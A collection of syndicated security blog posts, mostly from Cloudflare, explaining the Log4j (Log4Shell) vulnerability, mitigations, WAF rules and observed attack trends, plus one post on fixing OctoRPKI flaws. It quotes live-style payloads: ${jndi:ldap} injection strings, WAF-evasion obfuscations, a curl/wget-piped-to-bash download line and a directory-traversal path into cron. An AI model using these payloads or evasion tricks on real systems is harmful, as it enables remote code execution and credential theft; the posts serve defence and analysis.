It was discovered in October, and disclosed last week — after most Linux distributions issued patches. Of course, there’s lots of Linux out there that never gets patched, so expect this to be exploited in the wild for a long time.

Of course, this vulnerability doesn’t give attackers access to the system. They have to get that some other way. But if they get access, this vulnerability gives them root privileges.

More Log4j News

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/12/more-log4j-news.html

Log4j is being exploited by all sorts of attackers, all over the Internet:

At that point it was reported that there were over 100 attempts to exploit the vulnerability every minute. “Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups,” said cybersecurity company Check Point.

And according to Check Point, attackers have now attempted to exploit the flaw on over 40% of global networks.

And a second vulnerability was found, in the patch for the first vulnerability. This is likely not to be the last.

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Hot on the heels of CVE-2021-44228 a second Log4J CVE has been filed CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4J Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4J Body BLOCK
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID Description Default Action
100517 (legacy WAF)
2c5413e155db4365befe0df160ba67d7 (new WAF)
Log4J Advanced URI, Headers DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

In addition, the previous mitigations for CVE-2021-22448 as seen in version 2.15.0 were not adequate to protect against CVE-2021-45046.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, we see mass attempts to exfiltrate data including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability attackers were using un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi and ${jndi:ldap and simple rules to look for those patterns were effective.

Quickly after those strings were being blocked and attackers switched to using evasion techniques. They used, and are using, both standard evasion techniques (escaping or encoding of characters) and tailored evasion specific to the Log4j Lookups language.

Any capable WAF will be able to handle the standard techniques. Tricks like encoding ${ as %24%7B or \u0024\u007b are easily reversed before applying rules to check for the specific exploit being used.

However, the Log4j language has some rich functionality that enables obscuring the key strings that some WAFs look for. For example, the ${lower} lookup will lowercase a string. So, ${lower:H} would turn into h. Using lookups attackers are disguising critical strings like jndi helping to evade WAFs.

In the wild we are seeing use of ${date}, ${lower}, ${upper}, ${web}, ${main} and ${env} for evasion. Additionally, ${env}, ${sys} and ${main} (and other specialized lookups for Docker, Kubernetes and other systems) are being used to exfiltrate data from the target process’ environment (including critical secrets).

To better understand how this language is being used, here is a small Java program that takes a string on the command-line and logs it to the console via Log4j:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4jTester{
    private static final Logger logger = LogManager.getLogger(log4jTester.class);
    public static void main(String[] args) {

This simple program writes to the console. Here it is logging the single word hide.

$ java log4jTester.java 'hide'          
01:28:25.606 [main] ERROR log4jTester - hide

The Log4j language allows use of the ${} inside ${} thus attackers are able to combine multiple different keywords for evasion. For example, the following ${lower:${lower:h}}${lower:${upper:i}}${lower:D}e would be logged as the word hide. That makes it easy for an attacker to evade simplistic searching for ${jndi, for example, as the letters of jndi can be hidden in a similar manner.

$ java log4jTester.java '${lower:${lower:h}}${lower:${upper:i}}${lower:d}e'
01:30:42.015 [main] ERROR log4jTester - hide

The other major evasion technique makes use of the :- syntax. That syntax enables the attacker to set a default value for a lookup and if the value looked up is empty then the default value is output. So, for example, looking up a non-existent environment variable can be used to output letters of a word.

$ java log4jTester.java '${env:NOTEXIST:-h}i${env:NOTEXIST:-d}${env:NOTEXIST:-e}' 
01:35:34.280 [main] ERROR log4jTester - hide

Similar techniques are in use with ${web}, ${main}, etc. as well as strings like ${::-h} or ${::::::-h} which both turn into h. And, of course, combinations of these techniques are being put together to make more and more elaborate evasion attempts.

To get a sense for how evasion has taken off here’s a chart showing un-obfuscated ${jndi: appearing in WAF blocks (the orange line), the use of the ${lower} lookup (green line), use of URI encoding (blue line) and one particular evasion that’s become popular ${${::-j}${::-n}${::-d}${::-i}(red line).

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

For the first couple of days evasion was relatively rare. Now, however, although naive strings like ${jndi: remain popular evasion has taken off and WAFs must block these improved attacks.

We wrote last week about the initial phases of exploitation that were mostly about reconnaissance. Since then attackers have moved on to data extraction.

We see the use of ${env} to extract environment variables, and ${sys} to get information about the system on which Log4j is running. One attack, blocked in the wild, attempted to exfiltrate a lot of data from various Log4j lookups:


There you can see the user, home directory, Docker image name, details of Kubernetes and Spring, passwords for the user and databases, hostnames and command-line arguments being exfiltrated.

Because of the sophistication of both evasion and exfiltration WAF vendors need to be looking at any occurrence of ${ and treating it as suspicious. For this reason, we are additionally offering to sanitize any logs we send our customer to convert ${ to x{.

The Cloudflare WAF team is continuously working to block attempted exploitation but it is still vital that customers patch their systems with up to date Log4j or apply mitigations. Since data that is logged does not necessarily come via the Internet systems need patching whether they are Internet-facing or not.

All paid customers have configurable WAF rules to help protect against CVE-2021-44228, and we have also deployed protection for our free customers.

Cloudflare quickly put in place WAF rules to help block these attacks. The following chart shows how those blocked attacks evolved.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

From December 10 to December 13 we saw the number of blocks per minute ramp up as follows.

Date Mean blocked requests per minute
2021-12-10 5,483
2021-12-11 18,606
2021-12-12 27,439
2021-12-13 24,642

In our initial blog post we noted that Canada (the green line below) was the top source country for attempted exploitation. As we predicted that did not continue and attacks are coming from all over the wild, either directly from servers or via proxies.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Exploitation of CVE-2021-44228 prior to disclosure

CVE-2021-44228 was disclosed in a (now deleted) Tweet on 2021-12-09 14:25 UTC:

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

However, our systems captured three instances of attempted exploitation or scanning on December 1, 2021 as follows. In each of these I have obfuscated IP addresses and domain names. These three injected ${jndi:ldap} lookups in the HTTP User-Agent header, the Referer header and in URI parameters.

2021-12-01 03:58:34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://rb3w24.example.com/x}
Referer: /${jndi:ldap://rb3w24.example.com/x}
Path: /$%7Bjndi:ldap://rb3w24.example.com/x%7D

2021-12-01 04:36:50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://y3s7xb.example.com/x}
Referer: /${jndi:ldap://y3s7xb.example.com/x}
Parameters: x=$%7Bjndi:ldap://y3s7xb.example.com/x%7D						

2021-12-01 04:20:30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://vf9wws.example.com/x}
Referer: /${jndi:ldap://vf9wws.example.com/x}	
Parameters: x=$%7Bjndi:ldap://vf9wws.example.com/x%7D	

After those three attempts we saw no further activity until nine minutes after public disclosure when someone attempts to inject a ${jndi:ldap} string via a URI parameter on a gaming website.

2021-12-09 14:34:31
Parameters: redirectUrl=aaaaaaa$aadsdasad$${jndi:ldap://log4.cj.d.example.com/exp}


CVE-2021-44228 is being actively exploited by a large number of actors. WAFs are effective as a measure to help prevent attacks from the outside, but they are not foolproof and attackers are actively working on evasions. The potential for exfiltration of data and credentials is incredibly high and the long term risks of more devastating hacks and attacks is very real.

It is vital to mitigate and patch affected software that uses Log4j now and not wait.

On the Log4j Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/12/on-the-log4j-vulnerability.html

It’s serious:

The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the snippet in seemingly benign ways, like by sending the string in an email or setting it as an account username.

Threat advisory from Cisco. Cloudflare found it in the wild before it was disclosed. CISA is very concerned, saying that hundreds of millions of devices are likely affected.

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Post Syndicated from Jon Levine original https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote code execution on any system that reads these fields and uses an unpatched instance of Log4j.

Our mitigation plan

Unfortunately, just checking for a token like ${jndi:ldap is not sufficient to protect against this vulnerability. Because of the expressiveness of the templating language, it’s necessary to check for obfuscated variants as well. Already, we are seeing attackers in the wild use variations like ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}.  Thus, redacting the token ${ is the most general way to defend against this vulnerability.

The token ${ appears up to 1,000 times per second in the logs we currently send to customers. A spot check of some records shows that many of them are not attempts to exploit this vulnerability. Therefore we can’t safely redact our logs without impacting customers who may expect to see this token in their logs.

Starting now, customers can update their Logpush jobs to redact the string ${ and replace it with x{ everywhere.

To enable this, customers can update their Logpush job options configuration to include the parameter CVE-2021-44228=true. For detailed instructions on how to do this using the Logpush API, see our developer documentation.

Actual CVE-2021-44228 payloads captured in the wild

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/

Actual CVE-2021-44228 payloads captured in the wild

I wrote earlier about how to mitigate CVE-2021-44228 in Log4j, how the vulnerability came about and Cloudflare’s mitigations for our customers. As I write we are rolling out protection for our FREE customers as well because of the vulnerability’s severity.

As we now have many hours of data on scanning and attempted exploitation of the vulnerability we can start to look at actual payloads being used in wild and statistics. Let’s begin with requests that Cloudflare is blocking through our WAF.

We saw a slow ramp up in blocked attacks this morning (times here are UTC) with the largest peak at around 1800 (roughly 20,000 blocked exploit requests per minute). But scanning has been continuous throughout the day. We expect this to continue.

Actual CVE-2021-44228 payloads captured in the wild

We also took a look at the number of IP addresses that the WAF was blocking. Somewhere between 200 and 400 IPs appear to be actively scanning at any given time.

Actual CVE-2021-44228 payloads captured in the wild

So far today the largest number of scans or exploitation attempts have come from Canada and then the United States.

Actual CVE-2021-44228 payloads captured in the wild

Lots of the blocked requests appear to be in the form of reconnaissance to see if a server is actually exploitable. The top blocked exploit string is this (throughout I have sanitized domain names and IP addresses):


Which looks like a simple way to hit the server at x.x.x.x, which the actor no doubt controls, and log that an Internet property is exploitable. That doesn’t tell the actor much. The second most popular request contained this:

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

This appeared in the User-Agent field of the request. Notice how at the end of the URI it says /ua. No doubt a clue to the actor that the exploit worked in the User-Agent.

Another interesting payload shows that the actor was detailing the format that worked (in this case a non-encrypted request to port 443 and they were trying to use http://):


Someone tried to pretend to be the Googlebot and included some extra information.

Googlebot/2.1 (+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}

In the following case the actor was hitting a public Cloudflare IP and encoded that IP address in the exploit payload. That way they could scan many IPs and find out which were vulnerable.


A variant on that scheme was to include the name of the attacked website in the exploit payload.


Some actors didn’t use LDAP but went with DNS. However, LDAP is by far the most common protocol being used.


A very interesting scan involved using Java and standard Linux command-line tools. The payload looks like this:


The base64 encoded portion decodes to a curl and wget piped into bash.

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash

Note that the output from the curl/wget is not required and so this is just hitting a server to indicate to the actor that the exploit worked.

Lastly, we are seeing active attempts to evade simplistic blocking of strings like ${jndi:ldap by using other features of Log4j. For example, a common evasion technique appears to be to use the ${lower} feature (which lowercases characters) as follows:


At this time there appears to be a lot of reconnaissance going on. Actors, good and bad, are scanning for vulnerable servers across the world. Eventually, some of that reconnaissance will turn into actual penetration of servers and companies. And, because logging is so deeply embedded in front end and back end systems, some of that won’t become obvious for hours or days.

Like spores quietly growing underground some will break through the soil and into the light.

Actual CVE-2021-44228 payloads captured in the wild

Cloudflare’s security teams are working continuously as the exploit attempts evolve and will update WAF and firewall rules as needed.

Inside the log4j2 vulnerability (CVE-2021-44228)

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

Inside the log4j2 vulnerability (CVE-2021-44228)

Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.

It is CVE-2021-44228 and affects version 2 of log4j between versions 2.0-beta-9 and 2.14.1. It is not present in version 1 of log4j and is patched in 2.15.

In this post we explain the history of this vulnerability, how it was introduced, how Cloudflare is protecting our clients. We will update later with actual attempted exploitation we are seeing blocked by our firewall service.

Cloudflare uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.

But, if you work for a company that is using Java-based software that uses log4j you should immediately read the section on how to mitigate and protect your systems before reading the rest.

How to Mitigate CVE-2021-44228

To mitigate the following options are available (see the advisory from Apache here):

1. Upgrade to log4j v2.15

2. If you are using log4j v2.10 or above, and cannot upgrade, then set the property


3. Or remove the JndiLookup class from the classpath. For example, you can run a command like

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

to remove the class from the log4j-core.

Vulnerability History

In 2013, in version 2.0-beta9, the log4j package added the “JNDILookup plugin” in issue LOG4J2-313. To understand how that change creates a problem, it’s necessary to understand a little about JNDI: Java Naming and Directory Interface.

JNDI has been present in Java since the late 1990s. It is a directory service that allows a Java program to find data (in the form of a Java object) through a directory. JNDI has a number of service provider interfaces (SPIs) that enable it to use a variety of directory services.

For example, SPIs exist for the CORBA COS (Common Object Service), the Java RMI (Remote Method Interface) Registry and LDAP. LDAP is a very popular directory service (the Lightweight Directory Access Protocol) and is the primary focus of CVE-2021-44228 (although other SPIs could potentially also be used).

A Java program can use JNDI and LDAP together to find a Java object containing data that it might need. For example, in the standard Java documentation there’s an example that talks to an LDAP server to retrieve attributes from an object. It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server running on the same machine (localhost) on port 389 and goes on to read attributes from it.

As the tutorial says “If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL”. Thus the LDAP server could be running on a different machine and potentially anywhere on the Internet. That flexibility means that if an attacker could control the LDAP URL they’d be able to cause a Java program to load an object from a server under their control.

That’s the basics of JNDI and LDAP; a useful part of the Java ecosystem.

But in the case of log4j an attacker can control the LDAP URL by causing log4j to try to write a string like ${jndi:ldap://example.com/a}. If that happens then log4j will connect to the LDAP server at example.com and retrieve the object.

This happens because log4j contains special syntax in the form ${prefix:name} where prefix is one of a number of different Lookups where name should be evaluated. For example, ${java:version} is the current running version of Java.

LOG4J2-313 added a jndi Lookup as follows: “The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a “:” no prefix will be added.”

With a : present in the key, as in ${jndi:ldap://example.com/a} there’s no prefix and the LDAP server is queried for the object. And these Lookups can be used in both the configuration of log4j as well as when lines are logged.

So all an attacker has to do is find some input that gets logged and add something like  ${jndi:ldap://example.com/a}. This could be a common HTTP header like User-Agent (that commonly gets logged) or perhaps a form parameter like username that might also be logged.

This is likely very common in Java-based Internet facing software that uses log4j. More insidious is that non-Internet facing software that uses Java can also be exploitable as data gets passed from system to system. For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science and the exploit could get logged. This is why it is vital that all Java-based software that uses log4j version 2 is patched or has mitigations applied immediately. Even if the Internet-facing software is not written in Java it is possible that strings get passed to other systems that are in Java allowing the exploit to happen.

And Java is used for many more systems than just those that are Internet facing. For example, it’s not hard to imagine a package handling system that scans QR codes on boxes, or a contactless door key both being vulnerable if they are written in Java and use log4j. In one case a carefully crafted QR code might contain a postal address containing the exploit string; in the other a carefully programmed door key could contain the exploit and be logged by a system that keeps track of entries and exits.

And systems that do periodic work might pick up the exploit and log it later. So the exploit could lay dormant until some indexing, rollup, or archive process written in Java inadvertently logs the bad string. Hours or even days later.

Cloudflare Firewall Protection

Cloudflare rolled out protection for our customers using our Firewall in the form of rules that block the jndi Lookup in common locations in an HTTP request. This is detailed here. We have continued to refine these rules as attackers have modified their exploits and will continue to do so.

CVE-2021-44228 – Log4j RCE 0-day mitigation

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

CVE-2021-44228 - Log4j RCE 0-day mitigation

CVE-2021-44228 - Log4j RCE 0-day mitigation

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE).

This vulnerability is actively being exploited and anyone using Log4j should update to version 2.15.0 as soon as possible. The latest version can already be found on the Log4j download page.

If updating to the latest version is not possible, customers can also mitigate exploit attempts by setting the system property “log4j2.formatMsgNoLookups” to “true”; or by removing the JndiLookup class from the classpath. Java release 8u121 also protects against this remote code execution vector.

Customers using the Cloudflare WAF can also leverage three newly deployed rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4j Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4j Body LOG
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

Due to the risk of false positives, customers should immediately review Firewall Event logs and switch the Log4j Body and URL rules to BLOCK if none are found. The rule inspecting HTTP headers has been directly deployed with a default action of BLOCK to all WAF customers.

We are continuing to monitor the situation and will update any WAF managed rules accordingly.

More details on the vulnerability can be found on the official Log4j security page.

Who is affected

Log4j is a powerful Java based logging library maintained by the Apache Software Foundation.

In all Log4j versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Fixing Recent Validation Vulnerabilities in OctoRPKI

Post Syndicated from David Haynes original https://blog.cloudflare.com/fixing-recent-validation-vulnerabilities-in-octorpki/

Fixing Recent Validation Vulnerabilities in OctoRPKI

A number of vulnerabilities in Resource Public Key Infrastructure (RPKI) validation software were disclosed in a recent NCSC advisory, discovered by researchers from the University of Twente. These attacks abuse a set of assumptions that are common across multiple RPKI implementations, and some of these issues were discovered within OctoRPKI. More details about the disclosed vulnerabilities can be found in this RIPE labs article written by one of the researchers. In response, we published a new release of OctoRPKI, v1.4.0, to address and remediate these vulnerabilities.

Cloudflare customers do not have to take any action to protect themselves from these newly discovered vulnerabilities, and no Cloudflare customer data was ever at risk.

We have not seen any attempted exploitation of these vulnerabilities described in the advisory. We use OctoRPKI to perform Border Gateway Protocol (BGP) route validation so that our routers know where to direct IP packets at Layer 3 of the TCP/IP stack. TLS provides additional security at the TCP layer to ensure the integrity and confidentiality of customer data going over the Internet in the event of BGP hijacking.

RPKI and the discovered vulnerabilities

Resource Public Key Infrastructure (RPKI) is a cryptographic method of signing records that associate a BGP route announcement with the correct originating Autonomous System (AS) number. In order to validate the records that contain that information we use an open source software called OctoRPKI that is part of the cfrpki toolkit.

Fixing Recent Validation Vulnerabilities in OctoRPKI
OctoRPKI and GoRTR ecosystem diagram

OctoRPKI traverses a set of trusted certificate repositories, downloads all the records and manifests that they contain, and performs a set of validation checks on them. If they are valid, OctoRPKI will add their contents into a JSON file that is made available for GoRTR instances to consume.

RFC6481 further defines the role of certificate repositories:

  To validate attestations made in the context of the Resource Public
   Key Infrastructure (RPKI) [RFC6480], relying parties (RPs) need
   access to all the X.509/PKIX Resource Certificates, Certificate
   Revocation Lists (CRLs), and signed objects that collectively define
   the RPKI.

   Each issuer of a certificate, CRL, or a signed object makes it
   available for download to RPs through the publication of the object
   in an RPKI repository.

   The repository system is a collection of all signed objects that MUST
   be globally accessible to all RPs.  When certificates, CRLs and
   signed objects are created, they are uploaded to a repository
   publication point, from whence they can be downloaded for use by RPs.

The main list of trusted repositories that OctoRPKI uses can be found here. In general, OctoRPKI will attempt to process any file that it downloads from a repository. However, this leaves validation software open to processing malicious input. For example, OctoRPKI could be instructed to download and cache a file which contains a path that performs directory traversal, or it could be provided with a classic GZIP bomb attack leading to a crash. The RFC does not necessarily define limits on content within files returned by a repository and thus, a large number of undefined behaviors can occur.

Compounding this issue is the fact that any single repository in the chain of trust could introduce undefined behavior. Imagine a scenario where a malicious entity is able to compromise a single repository (there can be hundreds) within a trusted organization, or is able to introduce a malicious Trust Anchor Locator (TAL) file onto the host machine that is running OctoRPKI. In both cases, bad actors can attempt to trigger undefined behavior on machines running OctoRPKI by leveraging the fact that OctoRPKI will attempt to process arbitrary input. Our mitigations were primarily to fail closed whenever these events occurred as there is no other guidance in the RFC.

Undefined Behavior

There were two classes of attacks disclosed in the NSCS advisory that affected OctoRPKI:

Arbitrary File Writes

  • CVE-2021-3907 – Arbitrary filepath traversal via URI injection


OctoRPKI does not escape a URI with a filename containing “..”, which allows a malicious repository to create a file, for example rsync://example.org/repo/../../etc/cron.daily/evil.roa, which would then be written to disk outside the base cache folder. This could allow for remote code execution on the host machine OctoRPKI is running on.


In v1.4.0 we now filter URIs and force them to remain in the cache folder by overriding any upwards directory traversal.

Crash or uncontrolled resource consumption

  • CVE-2021-3908 – Infinite certificate chain depth results in OctoRPKI running forever
  • CVE-2021-3909 – Infinite open connection causes OctoRPKI to hang forever
  • CVE-2021-3910 – NUL character in ROA causes OctoRPKI to crash
  • CVE-2021-3911 – Misconfigured IP address field in ROA leads to OctoRPKI crash
  • CVE-2021-3912 – OctoRPKI crashes when processing GZIP bomb returned via malicious repository


All of these trigger either a crash or infinite runtime by abusing the fact that OctoRPKI will process any file it ingests. For a production critical service it is imperative that undefined behavior is identified early, and either tossed away or caught and presented to the user as an error. Consistent crashes of OctoRPKI can lead to denial of service type attacks.


We implemented bounds checking across many components within OctoRPKI. These include adding instances of checking array length before attempting to index specific locations, or other cases where we utilized built in controls that Go provides when using an HTTP client. Repositories that attempt to abuse bounds checks are either skipped or included in an error message presented to the user.

On our commitment to RPKI security

We are ecstatic to see quality security research, like the vulnerabilities discovered by researchers from the University of Twente, being performed in the RPKI space. It is an incredible sign of progress in the deployment of RPKI, especially considering how recent widespread adoption has been. We are committed to ongoing support of RPKI and look forward to continuing to work with the security community to make the Internet safer and more secure for everyone.